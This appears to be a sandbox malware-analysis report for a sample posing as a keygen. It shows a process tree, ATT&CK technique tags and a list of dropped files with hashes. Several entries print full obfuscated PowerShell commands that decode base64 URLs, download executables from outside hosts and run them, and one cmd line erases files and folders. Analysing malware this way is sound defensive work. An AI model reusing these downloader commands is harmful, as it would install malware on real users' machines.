                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1460
                  • C:\Users\Public\yhz.exe
                    "C:\Users\Public\yhz.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2600
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:1792
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2112
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:1408
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2264
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:2936
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:2572
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2212
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2212 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\634683081863111\\* & exit
                            9⤵
                              PID:396
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2212
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1636
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1388
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:916
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1168
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1404
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:528
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2120
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1804
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1460
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2816
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2772
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2924
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2856
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2848
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2948
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2920
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2992
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:3000
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2808
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2932
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:3016
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2756
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2584
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2580
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1056
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:944
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1920
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2136
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1996
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2800
                      • C:\Users\Public\yhz.exe
                        "C:\Users\Public\yhz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2236
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1344
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1348
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1428
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\ba.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:568
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1804
                    • C:\Users\Public\yfq.exe
                      "C:\Users\Public\yfq.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2660
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2732
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2968
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 836
                            8⤵
                            • Loads dropped DLL
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2156
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2800
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2160
                      • C:\Users\Public\yfq.exe
                        "C:\Users\Public\yfq.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2868
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\ba1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:772
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1148

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Modify Existing Service

            1
            T1031

            Defense Evasion

            Modify Registry

            4
            T1112

            Disabling Security Tools

            2
            T1089

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Collection

            Data from Local System

            3
            T1005

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\vcruntime140.dll
            • C:\ProgramData\vcruntime140.dll
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_020da25c-2486-4824-8562-ae65ef86bd9a
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d847f4e-6df9-4f4c-8472-2502358a9ea1
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d847f4e-6df9-4f4c-8472-2502358a9ea1
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d847f4e-6df9-4f4c-8472-2502358a9ea1
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d847f4e-6df9-4f4c-8472-2502358a9ea1
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d847f4e-6df9-4f4c-8472-2502358a9ea1
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9d06b90d-56ec-4cfb-8f7f-c184ef4b2807
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca3c9789-2c02-4d4b-a47c-225454ab3fb6
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f34cb381-d0de-425c-92b7-e5b36678a2f6
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\b.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\b1.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\ba.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\ba1.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\m.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\m1.hta
            • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\start.bat
            • C:\Users\Admin\AppData\Local\Temp\6cG77ZLakh.exe
            • C:\Users\Admin\AppData\Local\Temp\6cG77ZLakh.exe
            • C:\Users\Admin\AppData\Local\Temp\9LbdFUtYlQ.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
            • C:\Users\Admin\AppData\Local\Temp\EWoYpM0ceq.exe
            • C:\Users\Admin\AppData\Local\Temp\EWoYpM0ceq.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\Gnc2X0vFuC.exe
            • C:\Users\Admin\AppData\Local\Temp\Gnc2X0vFuC.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Public\gul.exe
            • C:\Users\Public\gul.exe
            • C:\Users\Public\gul.exe
            • C:\Users\Public\yfq.exe
            • C:\Users\Public\yfq.exe
            • C:\Users\Public\yfq.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
            • C:\Users\Public\yhz.exe
